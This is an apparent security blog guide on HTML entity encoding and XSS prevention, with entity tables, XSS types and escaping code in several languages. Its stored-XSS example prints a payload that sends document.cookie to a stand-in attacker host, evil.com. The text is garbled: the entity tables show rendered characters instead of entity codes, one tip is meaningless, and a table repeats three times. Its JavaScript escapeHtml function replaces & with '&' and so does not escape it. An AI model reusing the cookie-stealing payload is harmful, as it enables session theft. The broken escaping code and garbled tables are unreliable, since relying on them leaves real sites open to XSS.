HTML Encoder Guide: XSS Prevention & Entity Character Reference

Published April 10, 2026 · ~12 min read · By RiseTop Security Team

HTML Entity Encoding is one of the most fundamental and important defenses in web security. By converting special HTML characters into entity references, it prevents browsers from misinterpreting those characters as HTML tags or JavaScript code, effectively protecting against XSS (Cross-Site Scripting) attacks.

This guide covers HTML encoding principles, entity character references, XSS prevention strategies, and how to correctly use HTML encoding in different contexts.

🛡️ Need to encode/decode HTML entities quickly? Use the RiseTop HTML Encoder/Decoder to convert special characters to safe HTML entities in one click.

1. What Is HTML Encoding?

HTML documents use angle brackets < and > to define tags. When content itself contains these characters, failing to process them causes the browser to mistake them for HTML tags, leading to rendering errors or worse—security vulnerabilities.

HTML encoding represents these special characters through entity references. There are three formats for HTML entities:

Named entities: &, <, >, etc. (using predefined names)
Decimal entities: &, <, >, etc. (using Unicode code points)
Hexadecimal entities: &, <, >, etc.

For example, to display the text <script>alert('XSS')</script> on a webpage instead of executing it, you need to encode it as:

&lt;script&gt;alert('XSS')&lt;/script&gt;

2. Five Core Characters That Must Be Encoded

Five characters in HTML have special meaning and must be encoded in any HTML context:

Character	Description	Named Entity	Decimal	Hex
&	Ampersand (entity start marker)	`&`	&	&
<	Less than (tag start)	`<`	<	<
>	Greater than (tag end)	`>`	>	>
"	Double quote (attribute value)	`"`	"	"
'	Single quote (attribute value)	`'`	'	'

💡 Important note: ' is not defined in HTML4 but is valid in HTML5 and XML. For maximum compatibility, use ' instead in HTML attributes.

3. HTML Entity Character Reference Table

3.1 Common Punctuation Symbols

Character	Description	HTML Entity
©	Copyright symbol	`©`
®	Registered trademark	`®`
™	Trademark	`™`
€	Euro	`€`
£	Pound sterling	`£`
¥	Yen/Chinese yuan	`¥`
§	Section sign	`§`
¶	Pilcrow (paragraph)	`¶`
•	Bullet	`•`
…	Ellipsis	`…`
–	En dash	`–`
—	Em dash	`—`

3.2 Common Math & Science Symbols

Character	Description	HTML Entity
±	Plus-minus sign	`±`
×	Multiplication sign	`×`
÷	Division sign	`÷`
≠	Not equal to	`≠`
≤	Less than or equal to	`≤`
≥	Greater than or equal to	`≥`
∞	Infinity	`∞`
←	Left arrow	`←`
→	Right arrow	`→`
⇐	Double left arrow	`⇐`
⇒	Double right arrow	`⇒`

3.3 Common Typography & Spaces

Description	HTML Entity	Notes
Non-breaking space	` `	Most commonly used space entity
Thin space	` `	Narrower than a regular space
En space	`&ensp;`	Equal to half the font size
Em space	`&emsp;`	Equal to the font size
Zero-width space	``	Invisible, allows line breaks
Zero-width non-joiner	`‌`	Prevents ligatures

4. XSS Attacks & HTML Encoding Defense

4.1 What Is XSS?

XSS (Cross-Site Scripting) is one of the most common web application security vulnerabilities. Attackers inject malicious JavaScript into webpages, and the scripts execute when other users visit the affected page.

4.2 Three Types of XSS

1. Stored XSS

Malicious scripts are permanently stored on the target server (e.g., in a database or comment system). When users visit pages containing the malicious content, the script executes automatically. This is the most dangerous type of XSS.

<!-- Content submitted by an attacker in the comments section -->
<script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>

2. Reflected XSS

Malicious scripts are included in URL parameters, and the server "reflects" them back in the response page. The attacker must trick users into clicking a malicious link.

<!-- URL: https://example.com/search?q=<script>alert(1)</script> -->
<!-- Server returns unencoded content: -->
<p>Search results: <script>alert(1)</script></p>

3. DOM-based XSS

The vulnerability exists entirely on the client side—JavaScript directly inserts untrusted data into the DOM without encoding.

// ❌ Dangerous: directly inserting HTML
document.getElementById('output').innerHTML = userInput;

// ✅ Safe: using textContent
document.getElementById('output').textContent = userInput;

4.3 How HTML Encoding Defends Against XSS

HTML encoding is the core defense against XSS, but you must pay attention to the context. Different HTML contexts require different encoding strategies:

Context	Characters to Encode	Encoding Method
HTML content (inside elements)	& < >	HTML entity encoding
HTML attribute (double-quoted)	& < > "	HTML entity encoding
HTML attribute (single-quoted)	& < > '	HTML entity encoding
URL attribute (href, src)	HTML encode first, then URL encode	Double encoding
JavaScript inline	Requires stricter encoding	Avoid; use frameworks instead
CSS inline	Special characters	Avoid

4.4 Auto-Encoding in Modern Frameworks

Modern front-end frameworks encode output by default, greatly reducing XSS risk:

React: {} expressions in JSX automatically HTML-encode. Only dangerouslySetInnerHTML skips encoding.
Vue: {{ }} interpolation auto-encodes HTML. Use v-html with extra caution.
Angular: Template bindings encode HTML by default.

⚠️ Anti-pattern: Directly using innerHTML, document.write(), dangerouslySetInnerHTML, or v-html to insert user input is the most common source of XSS vulnerabilities. If you must use them, always HTML-encode the content first.

5. HTML Encoding in Different Languages

// JavaScript
function escapeHtml(str) {
  return str
    .replace(/&/g, '&')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Python
import html
safe = html.escape(user_input, quote=True)

// PHP
$safe = htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');

// Java
import org.apache.commons.text.StringEscapeUtils;
String safe = StringEscapeUtils.escapeHtml4(userInput);

// Go
import "html"
safe := html.EscapeString(userInput)

6. HTML Encoding vs URL Encoding vs JavaScript Encoding

These three types of encoding are often confused, but they serve completely different purposes:

Encoding Type	Format Example	Use Case
HTML encoding	< > &	Special characters in HTML documents
URL encoding	%3C %3E %26	Special characters in URLs
JS encoding	\u003C \u003E	Special characters in JavaScript strings
Base64 encoding	PGh0bWw+	Binary data to text

Key principle: Only apply the encoding required by the target context. Don't URL-encode first and then HTML-encode, or vice versa. Each encoding corresponds to a specific parsing rule—mixing them causes display errors.

Summary

HTML encoding is the cornerstone of web security. Master these key points to effectively defend against the vast majority of XSS attacks:

Never trust user input—always encode output
Choose the correct encoding strategy for different HTML contexts
Prefer the auto-encoding features of modern front-end frameworks
Avoid unsafe APIs like innerHTML and dangerouslySetInnerHTML
Combine with CSP (Content Security Policy) for defense in depth

⚡ Quickly encode HTML special characters: RiseTop HTML Encoder/Decoder — supports both named entity and numeric entity output formats.

FAQ

What is the difference between HTML encoding and URL encoding? ▼

HTML encoding uses entities starting with & and ending with ; (like < >) to safely display special characters in HTML documents. URL encoding uses percent prefixes (like %3C %3E) to transmit special characters in URLs. They serve different protocols and use cases—don't mix them.

What is an XSS attack? ▼

XSS (Cross-Site Scripting) is when an attacker injects malicious scripts into a webpage that execute when other users visit the page. The most common method is injecting JavaScript through unescaped user input in HTML. HTML encoding is the first line of defense against XSS.

What's the difference between   and a regular space? ▼

  (non-breaking space) differs from a regular space in three ways: 1) browsers won't line-break at  ; 2) consecutive   characters aren't collapsed into one (regular spaces are); 3) in CSS width calculations,   counts as a fixed-width character.

Do I still need to manually HTML-encode in React/Vue? ▼

In most cases, no. React's JSX {} and Vue's {{ }} interpolation automatically HTML-encode output. However, when using dangerouslySetInnerHTML (React) or v-html (Vue), you must manually HTML-encode the content.

Description	HTML Entity	Notes
Non-breaking space	` `	Most commonly used space entity
Thin space	` `	Narrower than a regular space
En space	`&ensp;`	Equal to half the font size
Em space	`&emsp;`	Equal to the font size
Zero-width space	``	Invisible, allows line breaks
Zero-width non-joiner	`‌`	Prevents ligatures

Description	HTML Entity	Notes
Non-breaking space	` `	Most commonly used space entity
Thin space	` `	Narrower than a regular space
En space	`&ensp;`	Equal to half the font size
Em space	`&emsp;`	Equal to the font size
Zero-width space	``	Invisible, allows line breaks
Zero-width non-joiner	`‌`	Prevents ligatures

Description	HTML Entity	Notes
Non-breaking space	` `	Most commonly used space entity
Thin space	` `	Narrower than a regular space
En space	`&ensp;`	Equal to half the font size
Em space	`&emsp;`	Equal to the font size
Zero-width space	``	Invisible, allows line breaks
Zero-width non-joiner	`‌`	Prevents ligatures